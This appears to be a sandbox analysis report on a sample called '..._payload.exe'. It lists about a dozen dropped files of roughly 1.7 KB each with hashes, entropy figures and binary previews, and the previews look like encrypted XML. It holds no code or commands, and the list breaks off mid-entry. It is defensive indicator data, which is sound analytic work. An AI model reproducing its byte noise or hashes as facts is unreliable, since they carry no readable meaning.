                                                                                                Preview:<?xml.J/...9rp.n.1.t...@4..WxB.K.V..c.....Zz.....O.w.a..<.....N..!..p.n.U..6O.k..$.......@).B....d?....U. ..G@9...#.4<S.SvU.%...4M.f........;._.g.......=.\f...o(*.k..fG.x.......5.?o..{...U.q..=(.byJ.WYjgS..............y.p.R.c.......Y........`.s..uw+...v_.....'C....A.....0...N.wEHv...M...+._..s$...".d/_.[ ...y.L....Vb.A..1..!&.^.M.7+..i.....bD..;.d.)k..4!o..+.4.W6..nloO.#.......z.F..6.,Q....Z/c.../UJP...}<...o.jF..e7......2.....#.......q.y.....0|"...i4.0c|..|.....T....vX...C.)q.[.?...V...F.a8.2\...:..:..I....s.P.2*V)......M.]......b;My...SPQ.X}t...J..*..U....fV..:......-.< a..{...|.i.....K....4o.P.Qz...l._....\....h.x...DX...'T...EC0....u...L..... .MVt..... p.%.*cK....*.....`..S5,.:...#1.$.1>.Xi......rM.....u....P.RS...~........ .&..-{...m...R`.....l.]..J....|aa..^U.L........ .Jy.....:x ....p.U|...y.*+....B."<..=..@f...X.....6<.vd..no.j..5.......>C'6.....@.g...p....:u.]`."...v[Q7).....a..8.7./Of.2..5...m..v...V....t...:.Wr..)2.5..!tV...\.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1752
                                                                                                Entropy (8bit):7.877767211996799
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:XIcnhk2TAQeYh37gfU0ynmmgiGfkOYSQ0VH+UXAzBV5P4ZVXLD:4OkysUyZiG8cQ0lTAzBjP+l
                                                                                                MD5:2802D953A7177814CF422D8B801BA4A1
                                                                                                SHA1:6778F78B5F3ED69A3E3D9B457B6448C6E1AA969C
                                                                                                SHA-256:6C37E31A43D1324F991F06878851C4F7B3DE1967326C1B52F43ED99029B76F51
                                                                                                SHA-512:26743CA3F2D99D9C9056597CE8CBC1E1FEB743E1F297E7FC96D4C94D15E8A690CF0D944DFEC639C632423EABD6C445E19C1F19C3646A6ACE3F62150AC3054370
                                                                                                Malicious:false
                                                                                                Preview:<?xml..;Z...h8.{../...o..6..W..<.L"e..4.]?>Jv....&...M..yaMJ.....K..\....M.J..y.a.!...........D..B[{...g.../.B*.....3-.......PT......?Kk.7............I.W....{BF.w....VN9.h....w.?..<...)$..'..ouONL.9..|.....9N+Hb.......n..cve4.W....)....q..z.....}..~oV..6..0.{.!+e.k....)k.E..i..B..I..Y/u......_b......%.3#K.>..vJ..U(fR..'yf_.>T7U.\J...v.p....b...M...#.).Mj....a..,..d..|.@.#..T..Q..<z'...A..y...@T5....h$.U.5.....X.......!....m..X..t.N$.=.D.."Z.W...W..T.v~^....<~r.... ....S.VPS..8..M.......Ls.`......-....Z8c...3....".....I9.....k<.i%D.6LwQ55.e6N..BY.sa....i..&.....C....!D'.k..A?.q...Q..J.;........c.......A.O4`hab...4..I.......b\.....PzAih...`...GMQ...-.4..5..M[.j.tL..K.Nz.E.5..,...u.uh...x.Rw.L.:.....+..C.|&.G....5...l..&].T.;?...4..V.=A.zX@..YY..../.b.(..m_.~5s.....U.i..LZ^.|Ubu..ui........v... L..".UUj. .......WU.%.1....U..qz......{.3f_!...(Y|...m...g...e...O..\...(j........B..?4J.'>..ca1...A;..@N.Fr&6lR....c..ek..L......n........4.K..R/$
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1699
                                                                                                Entropy (8bit):7.896997126184588
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:xdeE+SLpdsN0fqkPLBhuUIlEdQYA4bQ2UflA/bDXXRAstKR4fRwvVRNax3bD:b1+Wp+NUpBFmEdQY5bOA//n74eLD
                                                                                                MD5:9A8C0A8E6A9AEE31024615A94770D0C9
                                                                                                SHA1:216AD3E2621B67A66A7294A0AB1526AD0FE41DB7
                                                                                                SHA-256:92EBECB30EA031E4E1D35EDF188B02324F310A2D42A9706EB84D4C18BBA206F8
                                                                                                SHA-512:BECCCBAF54691B0E6EEE92688B094792269551F62604D12C6C1D2A0D1059B5F818304B3E657BB528C1E7ABC82A5C1AC2CA7AFC1F96506A8BFB5D4E0F4D224DB7
                                                                                                Malicious:false
                                                                                                Preview:<?xml.T..T.h/....=.y@....!.]..(.x.....HL..z.^.\..q...>."L.......P.b{`(.......|...K.8u.?.V.'.D..x...v...3/ux(.g....M-g.E.=.c.$......f..+V...s!....s..c.V0...E...nH..O....:...1r..Y...K.=s./..be.8..aQA..9.P......}..a.\<.*.b....$[...B:|..y}r..+.wZS...h.a.....~...y.>.#..a.4D..pZ.'..'.Dm....I..^&L(..q..4]..)...).@;.>...1.j,..n...]h.......J....B..a..^...&.......z}..{nx...+..a..............`f.B..qP....$.#.5....C...F......B..I...+b....!.>........d.....p..(bB.|R.Q...zE..0..2.L.@..{.7.RS<.vz....!..v.k3.l.]=6SkPS...v...2C.&.K.T[....`.qI.(........DW.d.u.....n...t..Om.4.V.Z...c....x.L...,I......_.r..P..{......l..."..O....8..'ZVh4..i..<.0.......Q...TQx...>.).2.....k.x...p..._..f..3.o.6.&...Q..f.:&".;...."..1....x.Q...L.-z..?.6..s%C..b.....:...m.cz7.?A.-"..."........P.e.H...5...H.z.yC.....d. ....^.b..-...K.GR...5.Q.=w...Q.*......=...v....R.p`.Z....!.j...!op.OP...U.j!>..A.5..."s..+=CUh.....Xks....1..c.O..Wd.w.........0......O.4....~.S.C.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1736
                                                                                                Entropy (8bit):7.8932054255184285
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:mf9gCZdv1TfCHgeQIvlVMlCtb8lEB29IhUiLD:mLdv1jKxVJpAX9li
                                                                                                MD5:23EA6341689647E6EBFD9BE813FF686C
                                                                                                SHA1:BA44C0D3A50E86EBA559488028D848B9FF4E200B
                                                                                                SHA-256:A50C1C0B913784CE9520294A99D8097143ECA391DECAD61A4894E108397F56A9
                                                                                                SHA-512:E4ADE5792EC6F695FCCE6E9DDE5A9D154F207B599219EED95DDB308DDE24B8B8A4FFE0BE73F873AC71CD3092930C939FC06E03DD94346F7C67C20E256C1B61D4
                                                                                                Malicious:false
                                                                                                Preview:<?xml.6.<..)O.B.dz..T{.4X.T.....Y.e.w...r.P.62.T.;......J...n}p}....]!...e..w'.s....a..O.M,Mm.y...t.2.}...._v#....]...%t.]..\..Lg....s....ed.pnm.,o..y|P#....v!q[.W.p.6@..T.%........`..S%.k.?...Z....z...jZ1.....jC>=r.jF<...e.cC....g2..v.....x.y. 2.~.o..(.OS..#8......7...w.A.F[.'.......;.lB.....x.K.1h.]>..{...........`...Z...r Q....7.H.Pc_....@.gp...a...c.R<&....5...K$.3..4h....6&.fs1....~...y-._.R:.!.|..Ba.....t.X7..(..8.z...YR..Q=.N...x....`.&R.F..1<.Q.~.L...g..".ld..$7..~.....X..2$W;...V...h.{....l....(.........~.`<eX.{&...F.N~..#$.....5...'o..jy....A......b..,.S.."..U...N.(......s.....&$.e,.0....8~.F\.q..d.....3L4*..u'.6.h...........V......Z.8#..5NKvL..+.....@......Kd.....b2.0ag.Rl%.j$C3..~....>..6....i...LM.yEy0...,p.7....N.Z......&Q0.....!.R...^.X.....j....D..S..M..>Mz...i;.`.xN..F.x...{.y2%.X.{...1v.t.....*C.......:.H{.....V.~N+^.....9.q..<.@V.r02'...%e.. @....I<p#.X.2.b..Mt....-.....'.B..z...7K...`Q.c.2.!......$..y2).'k.<..1
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1721
                                                                                                Entropy (8bit):7.8885316295366
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:74L2hZZip8nlNXWhp861sMSL2nvvMr0LD:qMZDldWhH1sMS6X8Q
                                                                                                MD5:B252D649F54366A3C550646E9099A567
                                                                                                SHA1:CEA95A0621E690921A1E142FF9C3C6BB284DFB27
                                                                                                SHA-256:05EDDEBB37F95BD9C535547D75CF08E19AA2059E590E033BEE4200F2CE1C9AD6
                                                                                                SHA-512:0E39ABE100F261689BD1A12E198F4837DFCE64C257B266894AC6EA924A9B78973A2BF2567ED9D1C6EC501819EE66CC30248582E5800216A61E74003A3E8AB51E
                                                                                                Malicious:false
                                                                                                Preview:<?xml.qLH..;..b`.P3[..?.z._.y'.a...*Hn........]..'.:;..@.7.a~J.7..h..|F.J.....c...'._.7...R/< .|...N=.|.+.p...:....x...x..sZ......%....TI.N4.6.~b......G/....Y.xZ....U)?_..s...H`.H..38\Q.|.9.D.A.>..Y.v.S..%.w.k.q.6..h`Y..........1.d....%. r..i....2....2....O;8..}y.[....?...0*./.....D.[.."... ...>..>...S"....zo......Y.a..T.L...^......3.r.....5....)....{.....t'.I.=...........0.Q.......H.e1...l..Km7o.J.gV.k....}Vl.-. +.!....S.}."p..y...K.@{^..]..c=..0../.............Q0<^.{&..~Got`& {...G,...s.qc._.m.pXE\.K...`..SYg...vp..a.._Y%....ObC....X..+Cx....._..~..h,pm.\B.EIq......Y.^9W....H...."o..E.......#).g\.>.\R.,y...X......LM.........._..}c.S..F..j....XS^lq0.}.N@.+..c?.@".!..T1...P.Z.?...B..}.&h}.\.\.....A..2..7L..X.c.g.>...O'.k.I.....8.)m.%.4..R.*.O. .......eO.1...~G...7EU...k.....A.J.I *....U.j...7.BRS..%R..G...o.o@y..v....Q..e.w....b...B.8.....o_....;..)Q7..|.#K............J.....Hj<.. .UM..]..)Hu.N.............Q.$m.%9l.//....B<CB>..xR..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1758
                                                                                                Entropy (8bit):7.896628545133333
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:A7xQQUlyeo1cdomHi9b0wLxWFHfkPN+wi/d3F/LD:KKQUoeoKeainWrwo
                                                                                                MD5:E55F8C6BCD62B2257A587764E93168E5
                                                                                                SHA1:F64E76537AA4D35A3B1138F5F3E72A5387B1FBD8
                                                                                                SHA-256:C11EFBDD59885EFABB88B91E0CF4BC4D1D8EE5DC7127C9C7A01A6DB0AA695C15
                                                                                                SHA-512:5BB7AC2DA8D618052BE988FEA73A4EF6BC01E2CE6ABEABA2E03213ABF36DFA59BE1AB2959763C187540A84AC105017F4C75074F8050C46EE50E94E6602D84DFB
                                                                                                Malicious:false
                                                                                                Preview:<?xml..,@.....=Y....n..J..x..9..ci.fPAeZ.......y...;$..J..u...x&..].F.....H.#{`:. ..x.....).&T..'dxN...\..F+i..$..&.&f(T..nHw..&!tBB..I=..)`.m.....K....I.+N........g..=.t..v9.!..<|8..O..[]....l.'/h.....G..?.h...8.t.S?...2B9.c.J...-0....;sA.1NYf'.....v.`......].!........J.......tv.(.0W...._.4...[..Ib].#?...I.6.R;h.g.y2..5.~.|P...RN.`.Gy......}{.....Yy...r,..*........]...9...yi...$.j.?.\V....*.@x...3....).\.$..n......k...1/..-s....>cN-..|K....q.>...$.R1....0..2..8.Sj.......o.Q...1t.....=i.=.`.t._...."..).I.|...;e....;A..<%..j...2.(W'..VW....5..K..p..a.......^:C.5...'..<N....8..5;...(]z!.m@.....8.sN.o...{uv..Y..9...T......q..z.*S.>d..t.V...E.Hw?.f...Yd...zu...1*.w.HC,..t2....y'J.r..u...;.....L..B.Ca.......+. d..bk..L..W..x.....<.g.....K6..Ml...E.`....j?.mm.(;..k....Ft..mi. ...%).p...e..J.5;.axw.lG\..o...3.kr.T....t.lw.?....:...bV"........Y....,....v;..6....f..x.......Ck.y.Y.!5.>..R...$. #u}u.Q.....]A-?:...g.r....\..1...5..[..T..(..T.6.^.A...._
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1705
                                                                                                Entropy (8bit):7.8953382044358325
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:IRx8facxeuFIWS2cnTDGS3oHAsLWPxF1NLD:IRtwc3t3oHAsLub1Z
                                                                                                MD5:4D00BE4ADEB6BD3D510B0DC461EE0427
                                                                                                SHA1:7DBF81ECF2C3C66FCC86DE8EB8AA237343012E28
                                                                                                SHA-256:B3FA324846715D33C2B81051CE597D8E4A030B8ACF214FF5A3A046CBBE11734D
                                                                                                SHA-512:FACB9270A3166002FE3AEA1D125861F613C0525585AAB5DB0ABA560100CE1FD111F7C13EB3534AA0D7894C1929573BC3766235A568B3F019E4F4C36A72B8C2A9
                                                                                                Malicious:false
                                                                                                Preview:<?xmlS...?..`.O.J..1....)..-.bq.7...C%Z..8.y../......W...D.y.....=...)..8....s.~a....t.`#`&.....A.[.....M,:Q5YJ...6.E.A.!.8......3.!..<&CM...F ....9m.K.3.%..`^..P.A.$......K.Fb.!s@..0...Ob.n....z.....KB.H..R...<...5.t....5lI...].../..2.4../BE.pr.$x8B.4.1..)....\.XD.b.8..!.....t....r..y.0.6....v}J....J,.....j...4..N.b../.... ...q..w..l'...n(......m._...z.=....xN.H.d.}V.ex....6.....l*.4.(.c.B....fV(:...P.....S.!.#.Nq.....2%..d..rp..H.n..)Vu...}.k.....ywu.LhG.....-..l..~...h...u..k...'....M.)f...m-..*.X..].z.....w.;ij.t.?....F....j......|<..T....G../.....+.....0V.q.Z....;.H..D.......1..\..yj.................if1.+z,..5..}B..C.}.,).nEs..Q..QY.^S..t....f.N...WT..~..`...e...v.5.....E.R..07.iq.ko?.A!|....i...*e..J3....F..2Y..z.`.....J.9..Y..-.G..BJn..]....#]...s..\Q=..K..V.....}W.O...W.FBI..=.l...,HgzR.k.8+...{c@..J..wy~+..$....{.%....5.A........Sh.M.._.T..+.>".....:..d.t...U..b..."z..s.k.iz.*..]1....@...H.....:......G....)..G
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1742
                                                                                                Entropy (8bit):7.889477115797063
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:Aya1sQ84URMOODjmNkO5mIS057ZFeRvD/LD:Aya1984UOOyVm757Zmr
                                                                                                MD5:3FF36905EABE1076FF7740B18023B449
                                                                                                SHA1:7D171B3F42136EB99DC9B65FB1BAF1F466482A89
                                                                                                SHA-256:D4A5497082E240257AE922A2483D0AAEBC4A80097AA02709B2A49AFA6988830B
                                                                                                SHA-512:C4D8EA5ACA2DC9E5CE3661E69B0B0855995632AEE9B5C271CA548E615BBAA655465C4FCC5A0B5B375FFAE1EF3FBC483A40BBC5D07BC9C0B9E33348077CD9AA6D
                                                                                                Malicious:false
                                                                                                Preview:<?xml..v;......a|K.ZI.w.g.v/<.Hc.......H.&...V...Uf.+..$[g.....3x.d.S..x$q(......3y9..&@....x..*m....D...).^r..zW.1..v.uM....Ug.....l.:.F.."K.....z.. ..A.....^z.d......KX.7.........b.j.2..X.y...s...]HA..@.:..g......9u.J.......A[O.!..6.......f.Lp..tO.P(p.*..V..z.kB.#c.&.M....{\..v.uK..6..U..V.2m ..j.4.%6...t..l1.@...8....l.g......|..`<<..lk.....S.".f....ZSh..O..Y.2Y.M..x.x.I...a.~.-p?.=.Ci.@........7..:n.D...1R>..lf.~(.:?.t...D.~..>V.\\.....j.....Q..n-..].....|..%./.R.69n...4.f]...EB........^.9.B...+L9.....+..<.Y.*..."2..b...v9g.6.*..&....6.]Y.........z.f+^{X.(_R.G..5Q)..E.....O.cQ-r....X..ct.8..M..O.>.@P..BA.(....)..:bP.8>..Q.b..%..x.,~.M.c.N3.\..J.[e...i..aM..!.jQQ.!&7....$.=.m.w...l.W^r......+JN....1...@..I.].3+w2...'...>..GX2sHZ..fr....-....j....5C!0...*V..u(.Y.!..I.{\6.w.b8k...^...z.%.}.e.=.*.;1.4.<.O.....rhK6.R..!|W.'.Ut..$......<..%2.$.)......mA..GL..>..v....ge...tV.I..i.R.....f....D.Jh=.K!....Da..T@.eu_......S.Kb.k.[i..T.(....r...PD.H& ..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1695
                                                                                                Entropy (8bit):7.871562446708106
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:a3oeib/05qVC5dCzxFZVUOM54YO2PuA2lMLD:aw/0gQCVFrXM54I2LlI
                                                                                                MD5:E12AB71E464169CAF4ECE2A784AEFA28
                                                                                                SHA1:BF1F0E41745F3CF497CDF4231C3D407F89C23EE5
                                                                                                SHA-256:C2A1067C55C9401168FBBBB22CBFDD5A40B6FE4EEA073D06C99E2F00CEB61A50
                                                                                                SHA-512:53F6A03F4C368FFC764A859B330D3E25C925EB7757E263F06A91D9343B3DB7C88AE146E02BB756D9685842E77056E073A54F85F964315D8FDBE78C4FE6EB2045
                                                                                                Malicious:false
                                                                                                Preview:<?xml..&9....?T..Y"Mc...gh..=|......g..j}a[{...1bteXV.^0......c.h..h.....!..~9...bk.I.......aa.b..dqK........]..O..`."&..?..6..o,0...N. .H.Q.3..s]..........Y8Wap.}..$,@..?.Ys.67w.pj....M...o..@.NQb$K..Q_.....+.....h`..?...dX.ax.\.?Q.U....."lX#|..v...@.p..0....B...2..cq.m.0).h7)...:-~.).].....A...."...'f ..FD.......HXq.........|...`.8.A.c.D=.X...J./q.........F..Q[G.c5..B6.8.Bp...NO>.~...t..f..&.G>].......2....B.~...NB...5...+.S3p5.s7.w..'\......, >d...E.r@..c...Z...L.....S.t_....>...6.W.$......G=........g..... ....k.Y .A@ {cC?V.8..k.A..&......*.Rc....i!}.......:.k.Q.j.i:..G..... n.I.>..{I5..r&..GkA9.*.D..]y`..10w...5......f....;...f+/=_.........g.a.x..i_....Jg..1.X...+%...w;..w.I..N-?....%..=A.C....L..A.4$rF{0...qo<W...l.y.k.}..c.}....I.)........|..i.f....4...)qR.E.r.@o...r..H.....?W.yS}.2.%.6?..7.M..".}..).......9...C)..M...........M.}F.od......$.....~..M&}_..u....z...E. .....y.P..iY..J.{.n..0..E.....r...K/...b.q....../.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1732
                                                                                                Entropy (8bit):7.8982356221282295
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:/R9PmI/bhOffyKrg+q+w2P/irWm0p/gg/iV+8LD:/dhOCuw2yrWm0pBPY
                                                                                                MD5:777CFFD08717715761300782B3EA9D41
                                                                                                SHA1:59ACE40A75E9CBA36FE5C9AF203BA2C485C6C3D6
                                                                                                SHA-256:40CE0671B05FD7803881FD332785309D43F8AED3B2F567B89458117B597B15E9
                                                                                                SHA-512:9B6ABCDC81633671E6DADDA97E3C54066AD32D447635F894CE85E5C247EEF977264D0D97C320DD776B4975009CDA6B864E68F822DF592F20529EBE9F3B911A0C
                                                                                                Malicious:false
                                                                                                Preview:<?xml..".+..B....`.u..O..[V..$.4.f..,.l.......Ll.?"......8....X6*-...-.i..~'..i...yr3.n..&..@1..G...q..7..e.l9....<..tD..........Y= ...O._...N.e.k.{..:......u.}........iv..,.....\..v.r.8r..4...k..v...t..A..l....pE..6.D..i-'.w:..N.jR.of.].....}.f.E..{....\...t.J...(...v_/..9.."!.{M.i._^...AN.yQ.L>.(......;....k.{...O......'...?.3|.x...-*.*.,.....#.2..(..HJ....P_pY.Qi.........z..D.Tt..vh...~ ..Y9..@."...]...~...}C>.%...no.b.<.{.........z..Q.....L.qO.,....Mf.X[.$.2.R..[.v.X/..s.y...*.d.F.:..F...j%...(..n..5.....g.k)..w.....+.AWf~|......R.ax..=.{-m#j5.g..m....RbH/0G..(.P....K\..f.vK..0..Z.l.N..M..#..`..V..K..5. ..%..K..Wm..R..|,.|?[5.O.}.G.....h..dHG+..#.x.n4P...:Q.).!"SK.K...r....>.B...<.Qg....$X.N..X..^O....9<..Z.v.....z....G........f.g1PC{.7...k5y..gV...W2@.._.Q..Vsg.Y....x...m...*!V..,.u..6....1......$.<w..&(...d...3...wi..A.yR.KkC^..u.c......(B.z.`...V.L..].zQ.\i....um.Ebwp.......v%JLRG...."....F..4B.M...._`..... ~FjcI.O;`KP..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1705
                                                                                                Entropy (8bit):7.887977839068784
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:mF8LpnsbbK+ZBC7t9uW1MPrOID5cqiXQcLD:mix+E911Mi+iA4
                                                                                                MD5:5D0B37F3F5FC27B8294CAD54C9951641
                                                                                                SHA1:CBEEB3F01D8016B98439795DCE77B8223A4CACA7
                                                                                                SHA-256:0BA47A6C495F1D922302D246CE1E564F7B72A237AB918E2816C0AAD778D94F6F
                                                                                                SHA-512:AA3E0B5D6480AECEEE8B56EF633C01DC72A4FBDBE2647F9800C808209A3AA0575FB1BB367A15D43228F0CC9B96AA3CD75D4C54D38E50CDF0EFBC8CBC52B1B568
                                                                                                Malicious:false
                                                                                                Preview:<?xml.d..V.sthUpf~...R3]m.m..:....}.F..w...c....C...fR.a.m.}.W..P..d.......*-0G...).%.7.(.7..S....)fN....a.j.g.M..et...T.t..X.D~.|.J..T....NOB..E/..:...)...j4I.f..5.!Q. ..h.9.a..D..;!..<..q....8...,...V.....].}S\.F.z..w..*hj..b.Dz."...w..T..r.AZ....*.......4.WOq*fk..t>.K..>.i.l..P9.|9DJ.1v7v.....nv.........p.....,..5. g..K:..F....!|.D.....n..x.{../m......izb..d2.VKn1.gz.nv..6..\0r.,. .@T...E.......G..;V5_r.......LB.^$..1....x......bs...U9<...........a..w$6\.i......b.l.2-....G.8G.0.^k)Z..=Q..|.H..VX....=J7..%....S..=..d.'".E..t.O.tY.S6..C..bJ1.#.....J.....3.1.......".......&J9~.n2.ZdI..H8..%R...]r...x......!....1..6..U..Q1.q/...qz1qp.A@..h...tS=X....vi].k......zPS..D.........9n ..#..6.}F.~....I..J..+...?...rV......6..k0.6..........i=}&}"..pLY.......ao.6.g....a.y...q......e...5........F.O.....m-j.lR*z.........(..g.f..BapS...4.i.`[W....w3....Z..B4..>O.....%.L.....Q..p....U/F...R.Hm....Y,..U....Gp.C.`....../.....q"5.e;q....r4.~.2.>..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1742
                                                                                                Entropy (8bit):7.898172900197326
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:Ptp/mMSanOhFktbHQR5/OLi2p1D4NvCBHOZ6dGLD:Ptp/mcP5HU5o26dO
                                                                                                MD5:12FF9FABE7326C4EB6E6DA0BA02340F3
                                                                                                SHA1:959CBEEBB5DFC5F756DA68379010AD4078F45EBD
                                                                                                SHA-256:49ADF746348D5C8051106AC41D3627839852EDD0E88F9701B809EB433EBF4A9D
                                                                                                SHA-512:F6EDAEA84CAF18381CE54E094FEE43A05DCDC0C1F560DD17A5F7499C0994E668159BDE62E8498D7AE81F1F20C5FD41251F43949D6F53A7925556E1305F189E42
                                                                                                Malicious:false
                                                                                                Preview:<?xml!].5+...q.{@...`.).fH...m.*..."..@.......HP.v.Fz.H.U5+%...I:f.....r|o....1.W.g..qD..5l.+.".p.+..9@.3.c..T}w.w.#.#.^....oN59%..0).[I....t..SK.J.p.8$............R....2bZ..Ornd^.Wj.H..P......\=...q?.Q..g3n..Q..-?r....D...$.........A..-.Sa<.|./V..=..ii.y....K.....j.)*^..S..]0`...0...e.$.....j...!M..P...1,"..W.K..Z./y..C...|...u3.x..G.w..../..., ....N.&......a..,........un....F...u..[......c......Ks<.%q...8....vV.&.*w..s..K..?j-.%y..gt..>...pC..T8hP.x......k.i....J.{..v.|*.....|.........X.u..ww^.u(..?....);...89...[$;...J.G..d.q0...9.a(4^..e..]x...tz...wPD.%..e..iA.a.........RL......Cf.ZLB2.A..~..G.Kc...R...x7)....e..e.....\...x."...}...+..,....g..... .2r.=...R...`..?..>U..mH.t..6...ncX.b..f.......H.s.....7o.^....4o8.6.Y..g..h.O.MR3..}..O.H..G.eM<`...Q...."....&../...m.(.K...V.K....Df.l.`.., ........t.._.<...h[...0.&K......p.ey.Yvc;/..(f......R.Q.&J.."...,Yn.b..6.....L..`......?_...r.C.T..E|1KI6....k.;p....h.M..?t...s!....? ..._../..q
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1691
                                                                                                Entropy (8bit):7.894537159488274
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:dBpJAsY7wFikuGtIRykhRGXgTcuWbr6mLD:dfywFsy0GXnuW/r
                                                                                                MD5:6651864B87741294A467E2E13E9A96E5
                                                                                                SHA1:DABE05896E0496A798DEC0D92C7EFCCB7B3B70EF
                                                                                                SHA-256:D1EB9D80748AABA32AE1DFDEEC62C7EA905681BAE5E947FA5F9E6A15A9D85684
                                                                                                SHA-512:5E9968F8C3BA4E16D20CA90CFE1BD0030C8F13DFD79217E7DF1361B8476631AABBAA883779F4B5B27B492ACEAC14F38E9B3E2D8AA0682DDC59B0B85127124E0E
                                                                                                Malicious:false
                                                                                                Preview:<?xml.....]\5.".....{2...6.1w.g..N..../.......B37...$!.jlW..q.U...9...I!*.jY...A[Nd....L.....'}..]....2. ..F3..I....h...b.k..}.....c...y........Y.l...-........>.8..{......E%Dxt.r.4C.....E....-..=..|..@.y[.WVdU.Y....h.....7..J],........(....@h........J.....9B...e.?.`.9..ZY+%r\.9..0..<..W$8S.G..N.>...E{"mh.[..'C.0..3..w.\d..B+.&.z.......c..c..{g....D....5...y.M"...........v...+.../...0..g..ZO.A&.*...._.@.K...~...H8...K.......h.B..$.(./..V.O`....)......j.g...'....L.z..T..+.N....\..8.mE......J.lL.&.O....Y..J.O.g.}u./..7...tI.aC..c7..%M...!8efH[....e.JvC...,V..*..P..LGqk......eG....A8...HN..N%k.G...7j<.....l;4...X....AD.N.....L....r<..hRo..a..-.&Q..........I....L.P....6....U...+..2.Eu.')....'.8..S.~.....xU....33^....x.u..Z...l*...i$b.J.T....x.vVR?He...7a.w..k...7.@...... ..&..p.._..EH..>...@...:4.i=,...B..'{'c.J.q..O...aL.%9\.r.....^.:2.[.2.d..Pqg...@.a.r..#.......N_....%.#.....3/.Xi.z...r.~.. .$p.....-.~..[.o...s..I............ED.1..2..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1728
                                                                                                Entropy (8bit):7.871414094710853
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:3aCJGasqbb8ZQmIGM3WpN7yTOCinRwSp9IAi/EKxLD:3aCJdjCSGMGgqRw+9O8m
                                                                                                MD5:9971351A8EA0BC06FB03EE4F4634AED4
                                                                                                SHA1:8EF86871D0EC151C7FEBEE8BB1F3F869E6DA8A86
                                                                                                SHA-256:243DBB1C574AA66FF7E5C93223A25A99A9C07A8D060DE9CA2ACC8116442BA3BF
                                                                                                SHA-512:C8CA5EEF1C925E459A43ABB520D5D0A335C6B40C202772E6A2E348B6F0F77E967748E444F9FDC7497B05DAC67D75B856605986261FDDF2BCBC70377C3381E89F
                                                                                                Malicious:false
                                                                                                Preview:<?xml....`Z!.Y.z.Vl.^......p.._&.v'.[.9K3R2.N#.rNZ...#G.]&;........y.^T....G.iO...h...lV.?.0...).6.a.t.......U._v......%...V.....2K|.$X.i.....R.P4p.m..........n.).i^...U).{../K..Uc.b..../........(.._..yu..Z..WG..r...Lf..k.`Q..JI.HB.*....5r....r.S.)..b....e,.......tq.ZC.)@.X._..d.@.-q.~..-.t2..........a..fCU.#.o..vD9.&..Z.Y..\.3.!.h..S.^<5oc0..f....a0H.F.+xl..B...#O..C.`.B....G.G..-.....x^w...*J.Tj.8c...c..)....4...D..)..5.s..}U.%w...).....P(D...#..<...u6/]...e.~.y>.?%..P?&...95..'/..!2...l*...v........w*....g.....Q.<..\..S..ma....uz...m.S+...o. ..b.lq`8......Q........}.Z...Z!.....19U_.[..../..U....2..b.5.<...,..:.#y....d.~UZ...s....F.."..V.`.....6...N..Qo.'..}....M.S.&.G".k.)..ov1.X.!.!......+D...EaG.t,....|...m.. B....@..L_ls.ce...s.^....BY......"7._.8..f/..x\..z.~.L.2E@......3ug.&.`L"..@...[...9....P.P....\(.{..B...... ;.....[D...X.%.dR/c.mvW{..z..v.ts..y..'..B.k..]D5...I........|.9]...U...E@....5.Z.G....Y6..e4i..K...uN..\..."eB&.Pc
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
